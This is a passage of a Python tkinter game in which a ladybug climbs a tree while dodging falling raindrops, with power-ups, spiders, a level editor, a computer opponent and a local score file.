canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2) canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3) canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4) canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5) canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6 ) def rainDropSplash(data): xPosition = random.randint(0, 800) data.splashScreenDrops.append(Coconuts(xPosition, 0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.splashText - 10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.splashText, text= """ 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) Scoreboard """ , font='Arial 14 bold', fill='yellow') splashScreenButtons(canvas, data) def writeFile(path, contents): with open(path, 'wt') as f: f.write(contents) def readFile(path): with open(path, 'rt') as f: return f.read() class Coconuts(object): def __init__(self, x, y): self.x = x self.y = y self.r = 9 self.fill = 'deep sky blue' self.speed = 30 self.outline = 'blue' def draw(self, canvas): canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r, self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill= self.fill, outline=self.outline, width=3) def onTimerFired(self, data): self.y += self.speed def hit(data): for coconut in data.coconuts: if data.mode == '1Player' or data.mode == 'levelCreated': if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r: if (coconut.x >= data.cx - data.r and coconut.x <= data.cx + data.r): data.cy += data.hitPenalty if data.mode == 'levelCreated': data.lives -= 1 elif data.hit == False and data.level < data.levelMax: data.score -= data.level data.coconuts.remove(coconut) if data.mode == 'levelCreated': data.levelEditorLives -= 1 def hit2Player(data): 
if data.mode == '2Player': if data.Invincible1 == False: for coconut in data.coconuts1: if (coconut.y >= data.player1Y - data.r and coconut.y <= data.player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data.player1X + data.r): data.player1Y += data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: for coconut in data.coconuts2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data.player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data.player2X + data.r): data.player2Y += data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): for powerUp in data.powerUps: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. 
                player2Y + data.r):
                # Player 2 caught an hourglass: freeze their drops and record
                # the y where the pause began (it expires after 120px of
                # climb -- see powerupTimerFired).
                if (powerUp.x >= data.player2X - data.r and powerUp.x <=
                    data.player2X + data.r):
                    data.pause2Drop = True
                    data.start2 = data.player2Y
                    data.powerUps.remove(powerUp)


class Invincible(PowerUps):
    # Umbrella power-up: same falling behavior as PowerUps, drawn with the
    # umbrella sprite; grants temporary immunity on pickup (hitInvincible).

    def __init__(self, x, y):
        super().__init__(x, y)

    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.umbrella)


def hitInvincible(data):
    # Pickup detection for umbrellas in every mode: sets the matching
    # invincibility flag and records the pickup height so the effect can
    # be expired after 120px of climb.
    for powerUp in data.invincible:
        if data.mode == '1Player' or data.mode == 'levelCreated':
            if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:
                if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +
                    data.r):
                    data.beInvincible = True
                    data.start = data.cy
                    data.invincible.remove(powerUp)
        if data.mode == '2Player' or data.mode == 'AI':
            if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.
                player1Y + data.r):
                if (powerUp.x >= data.player1X - data.r and powerUp.x <=
                    data.player1X + data.r):
                    data.Invincible1 = True
                    data.start1 = data.player1Y
                    data.invincible.remove(powerUp)
            if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.
                player2Y + data.r):
                if (powerUp.x >= data.player2X - data.r and powerUp.x <=
                    data.player2X + data.r):
                    data.Invincible2 = True
                    data.start2 = data.player2Y
                    data.invincible.remove(powerUp)


class ScaryBug(object):
    # Spider hazard that climbs up from the bottom of the tree; touching it
    # is an instant loss (see hitScaryBug).

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.speed = 25

    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.spider)

    def onTimerFired(self, data):
        # Spiders climb faster in the versus modes.
        if data.mode == '2Player' or data.mode == 'AI':
            self.speed = 35
        self.y -= self.speed
        # NOTE(review): `and` binds tighter than `or`, so this condition is
        # mode == '1Player'  OR  (mode == 'levelCreated' and time % 8 == 0);
        # in 1Player mode the spider changes lanes EVERY tick. Probably
        # intended (mode in ('1Player', 'levelCreated')) and time % 8 == 0.
        if (data.mode == '1Player' or data.mode == 'levelCreated' and data.
            time % 8 == 0):
            # Drift one lane toward a random side, bouncing back in off the
            # outermost lanes.
            side = random.choice(data.sides)
            if side == 'l':
                if self.x - data.lane >= data.Player1Min:
                    self.x -= data.lane
                else:
                    self.x += data.lane
            elif side == 'r':
                if self.x + data.lane <= data.Player1Max:
                    self.x += data.lane
                else:
                    self.x -= data.lane


def hitScaryBug(data):
    # Spider collision: in the solo modes it is an instant game-over (both
    # life counters zeroed); in the versus modes the touched player loses.
    # Solo modes use a 1.5x radius, versus modes a 1x radius.
    for bug in data.scaryBug:
        if data.mode == '1Player' or data.mode == 'levelCreated':
            if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *
                data.r):
                if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx +
                    1.5 * data.r):
                    data.hit = True
                    data.lives = 0
                    data.levelEditorLives = 0
        if data.mode == '2Player' or data.mode == 'AI':
            if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +
                data.r):
                if (bug.x >= data.player1X - data.r and bug.x <= data.
                    player1X + data.r):
                    data.winner = 'player2'
            if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +
                data.r):
                if (bug.x >= data.player2X - data.r and bug.x <= data.
                    player2X + data.r):
                    data.winner = 'player1'


def drawPowerups(canvas, data):
    # Draw every active hazard/power-up sprite (spiders, hourglasses,
    # umbrellas).
    for bug in data.scaryBug:
        bug.draw(canvas, data)
    for powerUp in data.powerUps:
        powerUp.draw(canvas, data)
    for powerUp in data.invincible:
        powerUp.draw(canvas, data)


def drawHome(canvas, data):
    # Home button in the lower-left corner of every screen.
    canvas.create_image(data.homeX, data.homeY, image=data.home)


def checkHome(event, data):
    # Clicking the home button resets the game back to the splash screen.
    if data.homeY - data.r <= event.y <= data.homeY + data.r:
        if data.homeX - data.r <= event.x <= data.homeX + data.r:
            init(data)


def coconutShot(data):
    # Single-player rain spawner: drop density scales with the level
    # (levelMax/level shrinks the spawn period as the level rises).
    if data.level > 0 and data.pauseDrops == False:
        if data.time % int(data.levelMax / data.level
            ) == 0 or data.time % 6 == 0:
            # One drop in each off-track strip plus one over the play area.
            xPosition1 = random.randint(0, data.Player1Min - data.buffer)
            xPosition2 = random.randint(data.Player1Max + data.buffer, data
                .width + data.buffer)
            data.coconuts.append(Coconuts(xPosition1, 0))
            data.coconuts.append(Coconuts(xPosition2, 0))
            xPosition4 = random.randint(data.Player1Min - data.buffer, data
                .Player1Max + data.buffer)
            data.coconuts.append(Coconuts(xPosition4, 0))
        if data.time % 5 == 0:
            xPosition3 = random.randint(0, data.Player1Min
- data.buffer) data.coconuts.append(Coconuts(xPosition3, 0)) if data.time % int(24 / data.level) == 0: side = random.choice(data.sides) if side == 'l': data.coconuts.append(Coconuts(data.Player1Min, 0)) elif side == 'r': data.coconuts.append(Coconuts(data.Player1Max, 0)) powerUpCoconutShot(data) def powerUpCoconutShot(data): if data.time % 60 == 0 and data.time % 120 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 100 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) def playerKeyPressed(event, data): if data.level < data.levelMax and event.keysym == 'r': init(data) if event.keysym == 'Left' and data.cx >= data.Player1Min + data.lane / 2: data.cx -= data.lane / 2 elif event.keysym == 'Right' and data.cx <= data.Player1Max: data.cx += data.lane / 2 if data.level >= data.levelMax: if len(event.keysym) == 1: if len(data.name) < 15: data.name += event.keysym if event.keysym == 'BackSpace': data.name = data.name[0:-1] if event.keysym == 'Return': data.scoreList += data.score, data.name writeFile('score.txt', data.savedScores + str(data.score) + ',' + data.name + '\n') data.mode = 'scoreboard' <|reserved_special_token_0|> def playerRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level, font='Arial 18 bold', fill='yellow') canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score, font='Arial 18 bold', fill='yellow') canvas.create_text(2 * data.width / 3, 660, text= """The greater the level, the more points get added to your score!""" , font='Arial 15 bold', 
fill='yellow') if data.hit == True: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') canvas.create_text(data.width / 2, 280, text='Score: %d' % data. score, font='Arial 13 bold', fill='yellow') if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 70, text='You Made it!', font= 'Arial 23 bold', fill='yellow') canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score, font='Arial 15 bold', fill='yellow') canvas.create_text(data.width / 2, 375, text= 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow') canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, 450, fill='white') canvas.create_text(data.width / 2, 425, text=data.name) def drop2Player(data): if data.winner == None and data.pauseDrops == False: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25: if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 12 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconuts1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconuts1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(755, 0)) powerupDrop2Player(data) def powerupDrop2Player(data): if data.time % 45 == 0 and data.time % 90 != 0: side 
= random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(540, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) if data.time % 60 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(540, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 90 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(540, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(755, 750)) def twoPlayerKeyPressed(event, data): if event.keysym == 'r': init(data) if data.winner == None: if event.keysym == 'a' and data.onLeft1 == False: data.onLeft1 = True data.player1X = 150 if event.keysym == 'd' and data.onLeft1 == True: data.onLeft1 = False data.player1X = 330 if event.keysym == 'Left' and data.onLeft2 == False: data.onLeft2 = True data.player2X = 550 if event.keysym == 'Right' and data.onLeft2 == True: data.onLeft2 = False data.player2X = 750 def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y -= data.speed if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 drop2Player(data) data.player2Y -= data.speed if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 drop2Player(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp 
in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def twoPlayerRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill ='yellow') winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 1', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. 
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text=
            'You Made it! Player 2', font='Arial 23 bold', fill='yellow')
    elif data.winner == 'tie':
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text=
            'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')


def editorKeyPressed(event, data):
    # 'r' restarts the whole game from the splash screen.
    if event.keysym == 'r':
        init(data)


def editorMousePressed(event, data):
    # Level-editor click handling: the first button row (y = easyY) selects
    # the player's climb speed; the other rows are delegated to
    # checkMiddle/checkLast. Selected buttons swap to the 'click' sprite.
    checkHome(event, data)
    if data.easyY - data.r <= event.y <= data.easyY + data.r:
        if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
            data.yourSpeed = 'slow'
            data.slow = data.click
            data.medium, data.fast = data.notClick, data.notClick
        if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
            data.yourSpeed = 'medium'
            data.medium = data.click
            data.slow, data.fast = data.notClick, data.notClick
        if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
            data.yourSpeed = 'fast'
            data.fast = data.click
            data.slow, data.medium = data.notClick, data.notClick
    checkMiddle(event, data)
    checkLast(event, data)


def checkMiddle(event, data):
    # Second editor row (rain speed). Note: data.medX (400) is reused here
    # as the row's *y* coordinate, matching where drawButtons places these
    # buttons.
    if data.medX - data.r <= event.y <= data.medX + data.r:
        if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
            data.rainSpeed = 'drizzle'
            data.drizzle = data.click
            data.rain, data.thunderstorm = data.notClick, data.notClick
        if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
            data.rainSpeed = 'rain'
            data.rain = data.click
            data.drizzle, data.thunderstorm = data.notClick, data.notClick
        if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
            data.rainSpeed = 'thunderstorm'
            data.thunderstorm = data.click
            data.drizzle, data.rain = data.notClick, data.notClick


def checkLast(event, data):
    # Third editor row (power-ups yes/no) plus the Enter button. The
    # x-bounds reuse data.easyY (300) and data.last (500) as x coordinates,
    # which matches where drawButtons draws the Yes/No images.
    if data.last - data.r <= event.y <= data.last + data.r:
        if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 *
data.r: data.powerUpsEditor = True data.yes, data.no = data.click, data.notClick if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r: data.powerUpsEditor = False data.no, data.yes = data.click, data.notClick if data.enter == data.click: if data.enterX - data.r <= event.y <= data.enterX + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'levelCreated' def drawButtons(canvas, data): data.font, data.fill = 'Helvetica 13 bold', 'yellow' canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data. font, fill=data.fill) canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font) canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font) canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font) canvas.create_image(data.easyX, data.medX, image=data.drizzle) canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data. font, fill=data.fill) canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font) canvas.create_image(data.medX, data.medX, image=data.rain) canvas.create_text(data.medX, data.medX, text='Rain', font=data.font) canvas.create_image(data.hardX, data.medX, image=data.thunderstorm) canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font) canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data. font, fill=data.fill) canvas.create_image(data.easyY, data.last, image=data.yes) canvas.create_text(data.easyY, data.last, text='Yes', font=data.font) canvas.create_image(data.last, data.last, image=data.no) canvas.create_text(data.last, data.last, text='No', font=data.font) changeEnter(canvas, data) def changeEnter(canvas, data): if (data.powerUpsEditor != None and data.yourSpeed != None and data. 
rainSpeed != None):
        data.enter = data.click
        canvas.create_image(data.medX, data.enterX, image=data.enter)
        canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)


# Advance the level-editor screen's rain animation: spawn a drop every
# other tick and move all existing drops downward.
def editorTimerFired(data):
    data.editorTime += 1
    if data.editorTime % 2 == 0:
        rainDrop(data)
    for drop in data.editorDrops:
        drop.onTimerFired(data)


# Spawn one decorative raindrop at a random x along the top edge.
def rainDrop(data):
    xPosition = random.randint(0, data.width)
    data.editorDrops.append(Coconuts(xPosition, 0))


# Draw the level-editor screen: background, rain, title, the editor's
# option buttons, and the home button.
def editorRedrawAll(canvas, data):
    canvas.create_image(data.width / 2, data.height / 2, image=data.background)
    canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    canvas.create_text(data.width / 2, data.S_P - 10, text=
        'Edit Your Level!', font='Arial 23 bold', fill='yellow')
    drawButtons(canvas, data)
    drawHome(canvas, data)


# Translate the editor's word choices into numeric speeds for the
# custom level: data.speed is the bug's climb rate, data.rSpeed scales
# how often rain spawns (smaller modulus = heavier rain).
def setEverything(data):
    if data.yourSpeed == 'slow':
        data.speed = 6
    elif data.yourSpeed == 'medium':
        data.speed = 10
    elif data.yourSpeed == 'fast':
        data.speed = 14
    if data.rainSpeed == 'thunderstorm':
        data.rSpeed = 7
    elif data.rainSpeed == 'rain':
        data.rSpeed = 10
    elif data.rainSpeed == 'drizzle':
        data.rSpeed = 13


<|reserved_special_token_0|>


# Periodically add power-ups (hour glass, umbrella) and a spider to the
# user-created level, but only when the editor enabled power-ups.
def levelPowerUp(data):
    if data.powerUpsEditor == True:
        if data.time % 20 == 0 and data.time % 40 != 0:
            Position = random.choice(data.spotList)
            data.powerUps.append(PowerUps(Position, 0))
        if data.time % 30 == 0:
            Position = random.choice(data.spotList)
            data.invincible.append(Invincible(Position, 0))
        if data.time % 35 == 0:
            Position = random.choice(data.spotList)
            data.scaryBug.append(ScaryBug(Position, 750))


<|reserved_special_token_0|>


# Mouse handling for the custom level: only the home button is active.
def levelCreatedMousePressed(event, data):
    checkHome(event, data)


# Tick the user-created level: climb the bug, spawn/move drops and
# power-ups, and run collision checks (skipped while power-ups that
# pause drops or grant invincibility are active).
def levelCreatedTimerFired(data):
    setEverything(data)
    if data.levelEditorLives > 0:
        data.cy -= data.speed
        if data.cy < 15:
            # reached the top of the tree
            data.level += 1
        if data.cy > 40:
            data.time += 1
            if data.pauseDrops != True:
                levelCoconutShot(data)
        if data.powerUpsEditor == False:
            for coconut in data.coconuts:
                coconut.onTimerFired(data)
            hit(data)
        if data.powerUpsEditor == True:
            for powerUp in data.powerUps:
                powerUp.onTimerFired(data)
            hitPause(data)
            for powerUp in data.invincible:
                powerUp.onTimerFired(data)
            hitInvincible(data)
            for bug in data.scaryBug:
                bug.onTimerFired(data)
            hitScaryBug(data)
            for coconut in data.coconuts:
                if data.pauseDrops == False:
                    coconut.onTimerFired(data)
                if data.beInvincible == False:
                    hit(data)
            if data.start != None:
                # power-ups expire after the bug climbs 120 pixels
                if abs(data.start - data.cy) >= 120:
                    data.pauseDrops, data.beInvincible = False, False


# Draw the user-created level: scene, drops, power-ups, the bug, HUD
# text, and the lose overlay (win overlay is drawn in the next part).
def levelCreatedRedrawAll(canvas, data):
    canvas.create_image(data.width / 2, data.height / 2, image=data.background)
    canvas.create_line(0, 20, data.width, 20)
    for coconut in data.coconuts:
        coconut.draw(canvas)
    if data.powerUpsEditor == True:
        drawPowerups(canvas, data)
    canvas.create_image(data.cx, data.cy, image=data.ladyBug)
    canvas.create_text(data.width / 6, 100, text='Total Lives: %d' %
        data.levelEditorLives, font='Arial 20 bold', fill='yellow')
    canvas.create_text(data.width / 2, 660, text=
        """You lose a life for hitting a drop
& don't get eaten!""", font='Arial 15 bold', fill='yellow')
    if data.levelEditorLives <= 0:
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            deadScreen)
        canvas.create_text(data.width / 2, data.height / 4, text='You Lose!
Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow')
    if data.level > 1:
        winEditor(canvas, data)
    drawHome(canvas, data)


# Victory overlay for the user-created level.
def winEditor(canvas, data):
    canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
    canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width / 2, 100, text='You Made it!', font=
        'Arial 23 bold', fill='yellow')


<|reserved_special_token_0|>


# Draw the computer-difficulty selection screen (Easy / Medium / Hard)
# plus an Enter button once a difficulty has been picked.
def drawDifficulties(canvas, data):
    canvas.create_text(data.medX, data.AITY, text='Computer Difficulty:',
        font='Arial 23 bold', fill='yellow')
    canvas.create_image(data.easyX, data.easyY, image=data.slow)
    canvas.create_text(data.easyX, data.easyY, text='Easy')
    canvas.create_image(data.medX, data.easyY, image=data.medium)
    canvas.create_text(data.medX, data.easyY, text='Medium')
    canvas.create_image(data.hardX, data.easyY, image=data.fast)
    canvas.create_text(data.hardX, data.easyY, text='Hard')
    if data.difficulty != None:
        data.enter = data.click
        canvas.create_image(data.medX, data.enterY, image=data.enter)
        canvas.create_text(data.medX, data.enterY, text='Enter')


# Handle clicks on the difficulty screen: select a difficulty (which
# swaps the button images), then Enter switches into AI mode.
def difficultyMousePressed(event, data):
    checkHome(event, data)
    if data.easyY - data.r <= event.y <= data.easyY + data.r:
        if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
            data.difficulty = data.difS
            data.slow = data.click
            data.medium, data.fast = data.notClick, data.notClick
        if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
            data.difficulty = data.difM
            data.medium = data.click
            data.slow, data.fast = data.notClick, data.notClick
        if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
            data.difficulty = data.difH
            data.fast = data.click
            data.slow, data.medium = data.notClick, data.notClick
    if data.enter == data.click:
        if data.enterY - data.r <= event.y <= data.enterY + data.r:
            if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
                data.mode = 'AI'


# Animate the rain on the difficulty screen.
def difficultyTimerFired(data):
    data.editorTime += 1
    if data.editorTime % 2 == 0:
        rainDrop(data)
    for drop in data.editorDrops:
        drop.onTimerFired(data)


# NOTE(review): duplicate of the earlier rainDrop definition — this
# re-definition shadows the first (identical) one at import time.
def rainDrop(data):
    xPosition = random.randint(0, data.width)
    data.editorDrops.append(Coconuts(xPosition, 0))


# Draw the difficulty-selection screen.
def difficultyRedrawAll(canvas, data):
    canvas.create_image(data.width / 2, data.height / 2, image=data.background)
    canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    drawDifficulties(canvas, data)
    drawHome(canvas, data)


# Computer player logic: when a drop (or spider) gets within `distance`
# above the AI, it may switch lanes — probability scales with the
# chosen difficulty. A direct hit knocks the AI down 50 pixels.
def hitAI1(data, distance):
    for coconut in data.coconutsAI1:
        if (data.player1Y - data.r - coconut.y <= distance and data.
            switchOnProgress == False):
            if (coconut.x >= data.player1X - data.r and coconut.x <= data.
                player1X + data.r or AISwitchBug(data, distance) == True):
                testInt = random.randint(0, 9)
                if testInt <= data.difficulty:
                    data.switchOnProgress = True
                    if data.player1X == 150:
                        data.player1X = 340
                    else:
                        data.player1X = 150
                    data.switchOnProgress = False
        if (coconut.y >= data.player1Y - data.r and coconut.y <= data.
            player1Y + data.r):
            if (coconut.x >= data.player1X - data.r and coconut.x <= data.
                player1X + data.r):
                data.player1Y += 50
                data.coconutsAI1.remove(coconut)


# Returns True when a spider is close enough (within `distance`) in the
# AI's lane that it should dodge; implicitly returns None otherwise.
def AISwitchBug(data, distance):
    for scaryBug in data.scaryBug:
        if (data.player1Y - data.r - scaryBug.y <= distance and data.
            switchOnProgress == False):
            if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data
                .player1X + data.r):
                return True


# Knock the human player (right side of AI mode) down 50px on a hit.
# NOTE(review): the `distance` parameter is unused here.
def hitAI2(data, distance):
    for coconut in data.coconutsAI2:
        if (coconut.y >= data.player2Y - data.r and coconut.y <= data.
            player2Y + data.r):
            if (coconut.x >= data.player2X - data.r and coconut.x <= data.
player2X + data.r):
                data.player2Y += 50
                data.coconutsAI2.remove(coconut)


# Spawn mirrored rain on both halves of the AI-mode screen (+410 shifts
# a left-half x into the right half); suppressed per-side while that
# side's hour-glass pause power-up is active.
def coconutShotAI(data):
    if data.winner == None:
        if data.time % 15 == 0:
            xPosition1 = random.randint(0, 385)
            if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:
                if data.pause1Drop != True:
                    data.coconutsAI1.append(Coconuts(xPosition1, 0))
                if data.pause2Drop != True:
                    data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))
        if data.time % 8 == 0:
            xPosition2 = random.randint(0, 80)
            xPosition3 = random.randint(364, 385)
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(xPosition2, 0))
                data.coconutsAI1.append(Coconuts(xPosition3, 0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))
                data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))
        addExtraCoconut(data)
        addPowerUpsAI(data)


# Drop extra rain and hour-glass power-ups directly in the two lanes
# (hard-coded lane x-positions for both halves of the screen).
def addExtraCoconut(data):
    if data.time % 18 == 0:
        side = random.choice(data.sides)
        if side == 'l':
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(140, 0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(540, 0))
        elif side == 'r':
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(344, 0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(755, 0))
    if data.time % 37 == 0:
        side = random.choice(data.sides)
        if side == 'l':
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(140, 0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(550, 0))
        elif side == 'r':
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(344, 0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(755, 0))


# Drop umbrella power-ups from the top and spiders from the bottom
# (y=750) into the lanes on both halves of the AI-mode screen.
def addPowerUpsAI(data):
    if data.time % 33 == 0:
